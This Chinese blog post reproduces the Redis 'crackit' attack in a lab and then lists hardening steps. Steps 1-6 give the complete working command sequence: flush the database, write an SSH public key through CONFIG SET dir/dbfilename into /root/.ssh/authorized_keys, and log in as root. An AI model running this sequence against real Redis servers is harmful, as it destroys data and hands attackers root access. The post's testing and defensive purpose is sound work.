Redis-Crackit漏洞测试

目前redis crackit漏洞爆出可以通过系统sh登录。免密码的,所以这个是很严重的。

下面我自己测试了下,并有几条防范措施。

环境:

客户端:10.19.21.241

服务端:10.19.21.242(此服务器运行redis服务的用户是root,如果不是root不能测试。)



### 1. 首先客户端生成ssh key


[root@VM-241 ~]# ssh-keygen -t rsa -C “crackit@redis.io
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
bb:16:6e:39:57:d4:b7:c0:dc:ed:05:80:a5:4e:7d:ae crackit@redis.io
The key’s randomart image is:
+–[ RSA 2048]—-+
| oo. |
| .o . |
| o +.o..|
| o ...+|
| S .. ooo|
| .. .. ..|
| ..o .E |
|
.. |
| o.o |
+—————–+


### 2. 给公钥添加换行

[root@VM-241 ~]# (echo -e “\n\n”; cat /root/.ssh/id_rsa.pub; echo -e “\n\n”) > redis.txt


### 3. 清空服务器redis数据(慎重操作)

[root@VM-241 ~]# redis-cli -h 10.19.21.242 flushall
OK


### 4. 将公钥写入到redis的key中

[root@VM-241 ~]# cat redis.txt |redis-cli -h 10.19.21.242 -x set redis
OK


### 5. 连接redis服务器

[root@VM-241 ~]# redis-cli -h 10.19.21.242
redis 10.19.21.242:6379> config set dir /root/.ssh #设置rdb存放路径
OK
redis 10.19.21.242:6379> config set dbfilename “authorized_keys” #设置rdb文件的文件名
OK
redis 10.19.21.242:6379> save
OK
redis 10.19.21.242:6379> exit


### 6. 尝试登录

[root@VM-241 ~]# ssh root@10.19.21.242
The authenticity of host ‘10.19.21.242 (10.19.21.242)’ can’t be established.
RSA key fingerprint is 12:79:d4:36:00:1d:de:48:13:bc:eb:e7:ca:83:84:c3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘10.19.21.242’ (RSA) to the list of known hosts.
Last login: Wed Apr 15 19:16:22 2015 from 10.19.10.25
[root@VM-242 ~]#

查看公钥内容
[root@VM-242 ~]# cat /root/.ssh/authorized_keys
REDIS0002?redisA?

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwUkf3THelm1tARScEkGDZkHiixtBUiS7nW6ShdIcK0apiL+/7CYh/SrCX1k9X0+wFhhNbdQBdz+AIPpQA2UlhAogsj6YRR1vXYORumw2tRmAkxBifvsV/ZZs54u50O6NmMesZRfkzMqskoZCwNVKbzPWuXKmcrIyBnQzRp9NL7YjQXQnAqkD7btGjpdZZudqr/IUnkcS1i8dAbRnF0jQybrT8NnbiqOWVnuIhlXVgnASdI+Qq/p0w83HuuivXZLMMuIwfU9Tj30hV+haqatib1L0G+QyUBpgVmxuUZJrGlMsM+Nj15K8TIPeK4cQ419SbbJXrkqWX2fPok7+9iiD6w== crackit@redis.io

?[root@VM-242 ~]# exit

这样表示这台服务器被外部控制

### 7. 如何防护

##### 7.1 在服务器端禁用flushall命令。

[root@VM-242 ~]# echo ‘rename-command flushall “”‘ >> /etc/redis.conf
[root@VM-242 ~]# /etc/init.d/redis restart


##### 客户端测试

[root@VM-241 ~]# redis-cli -h 10.19.21.242 flushall
(error) ERR unknown command ‘flushall’


##### 7.2 服务器端设置redis的监听地址为127.0.0.1


[root@VM-242 ~]# vim /etc/redis.conf
bind 127.0.0.1


##### 7.3 建议不要用root用户运行。我是yum安装,默认启动用户是redis,为了测试,在服务里更改成root。大家测试也可以这么修改。

[root@VM-242 ~]# vim /etc/init.d/redis
start() {
[ -f $REDIS_CONFIG ] || exit 6
[ -x $exec ] || exit 5
echo -n $”Starting $name: “
#daemon –user ${REDIS_USER-redis} “$exec $REDIS_CONFIG”
daemon –user root “$exec $REDIS_CONFIG”
retval=$?
echo
[ $retval -eq 0 ] && touch $lockfile
return $retval
}


##### 7.4 设置redis服务器密码


[root@VM-242 ~]# echo “requirepass  xxoo” >> /etc/redis.conf

 



坚持原创技术分享,您的支持将鼓励我继续创作!